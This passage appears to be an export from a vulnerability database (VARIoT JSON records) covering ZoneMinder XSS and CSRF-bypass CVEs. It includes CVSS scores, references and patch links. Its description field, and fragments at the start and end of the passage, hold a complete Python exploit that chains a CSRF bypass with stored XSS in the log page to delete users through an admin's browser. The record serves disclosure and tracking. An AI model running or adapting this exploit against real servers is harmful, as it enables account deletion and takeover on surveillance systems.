re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders)) finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';') except: print("[ERROR] Ensure the provided username and password is correct.") sys.exit(1) print("Collected the low privilege user session token: "+finalSession)
Request using response headers to obtain CSRF value
csrfUrl = "http://"+options.ip+":"+options.port+"/zm/index.php?view=filter" csrfCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": '"' + finalSession + '"'} csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58¤t=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"} response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies) zmBody = response.text extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody)) finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '') print("Collected the CSRF key for the log injection request: "+finalCsrfKey) print("Navigate here with an admin user: http://"+options.ip+"/zm/index.php?view=log")
while True:
#XSS Request
xssUrl = "http://"+options.ip+"/zm/index.php"
xssCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": finalSession}
xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"}
xssData = {"__csrf_magic": finalCsrfKey , "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"}
response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)
print("Injecting payload: " + response.text)
time.sleep(1)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202210-0307",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.36.27"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.24"
},
{
"model": "zoneminder",
"scope": "gt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.0"
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.37.0 greater than 1.37.24"
},
{
"model": "zoneminder",
"scope": null,
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.36.27"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"db": "NVD",
"id": "CVE-2022-39285"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Trenches Of IT",
"sources": [
{
"db": "PACKETSTORM",
"id": "171498"
}
],
"trust": 0.1
},
"cve": "CVE-2022-39285",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"id": "CVE-2022-39285",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "HIGH",
"baseScore": 7.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.1,
"id": "CVE-2022-39285",
"impactScore": 5.5,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2022-39285",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-39285",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2022-39285",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2022-39285",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202210-333",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-333"
},
{
"db": "NVD",
"id": "CVE-2022-39285"
},
{
"db": "NVD",
"id": "CVE-2022-39285"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder is a free, open source Closed-circuit television software application The file parameter is vulnerable to a cross site scripting vulnerability (XSS) by backing out of the current \"tr\" \"td\" brackets. This then allows a malicious user to provide code that will execute when a user views the specific log on the \"view=log\" page. This vulnerability allows an attacker to store code within the logs that will be executed when loaded by a legitimate user. These actions will be performed with the permission of the victim. This could lead to data loss and/or further exploitation including account takeover. This issue has been addressed in versions `1.36.27` and `1.37.24`. Users are advised to upgrade. Users unable to upgrade should disable database logging. ZoneMinder Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. # Exploit Title: Zoneminder v1.36.26 - Log Injection -\u003e CSRF Bypass -\u003e Stored Cross-Site Scripting (XSS)\n# Date: 10/01/2022\n# Exploit Author: Trenches of IT\n# Vendor Homepage: https://github.com/ZoneMinder/zoneminder\n# Version: v1.36.26\n# Tested on: Linux/Windows\n# CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 \n# Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/\n#\n# Proof of Concept:\n# 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)\n# 2 - Admin user logs navigates to http://\u003ctarget\u003e/zm/index.php?view=log\n# 3 - XSS executes delete function on target UID (user). \n\nimport requests\nimport re\nimport time\nimport argparse\nimport sys\n\ndef getOptions(args=sys.argv[1:]):\n parser = argparse.ArgumentParser(description=\"Trenches of IT Zoneminder Exploit PoC\", epilog=\"Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1\")\n parser.add_argument(\"-i\", \"--ip\", help=\"Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4\", required=True)\n parser.add_argument(\"-p\", \"--port\", help=\"Provide the port of the target zoneminder server. (Example: -p 80\", required=True)\n parser.add_argument(\"-zU\", \"--username\", help=\"Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv\", required=True)\n parser.add_argument(\"-zP\", \"--password\", help=\"Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv\", required=True)\n parser.add_argument(\"-d\", \"--deleteUser\", help=\"Provide the target user UID to delete from the target zoneminder server. (Example: -d 7\", required=True)\n options = parser.parse_args(args)\n return options\n\noptions = getOptions(sys.argv[1:])\n\npayload = \"http%3A%2F%2F\" + options.ip + \"%2Fzm%2F\u003c/td\u003e\u003c/tr\u003e\u003cscript src=\u0027/zm/index.php?view=options\u0026tab=users\u0026action=delete\u0026markUids[]=\" + options.deleteUser + \"\u0026deleteBtn=Delete\u0027\u003c/script\u003e\"\n\n#Request to login and get the response headers\nloginUrl = \"http://\" + options.ip + \":\" + options.port + \"/zm/index.php?action=login\u0026view=login\u0026username=\"+options.username+\"\u0026password=\"+options.password\nloginCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \"f1neru6bq6bfddl7snpjqo6ss2\"}\nloginHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=login\", \"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies)\nzmHeaders = response.headers\ntry:\n zoneminderSession = re.findall(r\u0027ZMSESSID\\=\\w+\\;\u0027, str(zmHeaders))\n finalSession = zoneminderSession[-1].replace(\u0027ZMSESSID=\u0027, \u0027\u0027).strip(\u0027;\u0027)\nexcept:\n print(\"[ERROR] Ensure the provided username and password is correct.\")\n sys.exit(1)\nprint(\"Collected the low privilege user session token: \"+finalSession)\n\n#Request using response headers to obtain CSRF value\ncsrfUrl = \"http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\"\ncsrfCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \u0027\"\u0027 + finalSession + \u0027\"\u0027}\ncsrfHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026minTime=2022-09-30T20:52:58\u0026maxTime=2022-09-30T21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\", \"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies)\nzmBody = response.text\nextractedCsrfKey = re.findall(r\u0027csrfMagicToken\\s\\=\\s\\\"key\\:\\w+\\,\\d+\u0027, str(zmBody))\nfinalCsrfKey = extractedCsrfKey[0].replace(\u0027csrfMagicToken = \"\u0027, \u0027\u0027)\nprint(\"Collected the CSRF key for the log injection request: \"+finalCsrfKey)\nprint(\"Navigate here with an admin user: http://\"+options.ip+\"/zm/index.php?view=log\")\n\nwhile True:\n \n #XSS Request\n xssUrl = \"http://\"+options.ip+\"/zm/index.php\"\n xssCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": finalSession}\n xssHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"application/json, text/javascript, */*; q=0.01\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\", \"X-Requested-With\": \"XMLHttpRequest\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=filter\"}\n xssData = {\"__csrf_magic\": finalCsrfKey , \"view\": \"request\", \"request\": \"log\", \"task\": \"create\", \"level\": \"ERR\", \"message\": \"Trenches%20of%20IT%20PoC\", \"browser[name]\": \"Firefox\", \"browser[version]\": \"91.0\", \"browser[platform]\": \"UNIX\", \"file\": payload, \"line\": \"105\"} \n response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)\n print(\"Injecting payload: \" + response.text)\n\n time.sleep(1)\n \n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-39285"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"db": "PACKETSTORM",
"id": "171498"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-39285",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "171498",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018651",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202210-333",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-333"
},
{
"db": "NVD",
"id": "CVE-2022-39285"
}
]
},
"id": "VAR-202210-0307",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T21:28:02.358000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ZoneMinder Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=209972"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-333"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
},
{
"problemtype": "Cross-site scripting (CWE-79) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"db": "NVD",
"id": "CVE-2022-39285"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/171498/zoneminder-log-injection-xss-cross-site-request-forgery.html"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/c0a4c05e84eea0f6ccf7169c014efe5422c9ba0d"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/d289eb48601a76e34feea3c1683955337b1fae59"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/security/advisories/ghsa-h6xp-cvwv-q433"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39285"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-39285/"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=log\")"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026mintime=2022-09-30t20:52:58\u0026maxtime=2022-09-30t21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\","
},
{
"trust": 0.1,
"url": "https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=login\","
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39290"
},
{
"trust": 0.1,
"url": "https://github.com/zoneminder/zoneminder"
},
{
"trust": 0.1,
"url": "http://\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=filter\"}"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39291"
},
{
"trust": 0.1,
"url": "http://\u003ctarget\u003e/zm/index.php?view=log"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-333"
},
{
"db": "NVD",
"id": "CVE-2022-39285"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-333"
},
{
"db": "NVD",
"id": "CVE-2022-39285"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"date": "2023-03-27T14:54:04",
"db": "PACKETSTORM",
"id": "171498"
},
{
"date": "2022-10-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-333"
},
{
"date": "2022-10-07T21:15:11.397000",
"db": "NVD",
"id": "CVE-2022-39285"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T08:27:00",
"db": "JVNDB",
"id": "JVNDB-2022-018651"
},
{
"date": "2023-03-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-333"
},
{
"date": "2023-03-27T18:15:11.557000",
"db": "NVD",
"id": "CVE-2022-39285"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-333"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder\u00a0 Cross-site scripting vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018651"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-333"
}
],
"trust": 0.6
}
}
VAR-202210-0233
Vulnerability from variot - Updated: 2025-01-30 21:11ZoneMinder is a free, open source Closed-circuit television software application. In affected versions authenticated users can bypass CSRF keys by modifying the request supplied to the Zoneminder web application. These modifications include replacing HTTP POST with an HTTP GET and removing the CSRF key from the request. An attacker can take advantage of this by using an HTTP GET request to perform actions with no CSRF protection. This could allow an attacker to cause an authenticated user to perform unexpected actions on the web application. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue. ZoneMinder There is an authentication vulnerability in.Information may be tampered with. # Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS)
Date: 10/01/2022
Exploit Author: Trenches of IT
Vendor Homepage: https://github.com/ZoneMinder/zoneminder
Version: v1.36.26
Tested on: Linux/Windows
CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291
Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/
Proof of Concept:
1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)
2 - Admin user logs navigates to http:///zm/index.php?view=log
3 - XSS executes delete function on target UID (user).
import requests import re import time import argparse import sys
def getOptions(args=sys.argv[1:]): parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1") parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True) parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True) parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True) parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True) parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True) options = parser.parse_args(args) return options
options = getOptions(sys.argv[1:])
payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F<script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'"
Request to login and get the response headers
loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password loginCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2"} loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"} response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies) zmHeaders = response.headers try: zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders)) finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';') except: print("[ERROR] Ensure the provided 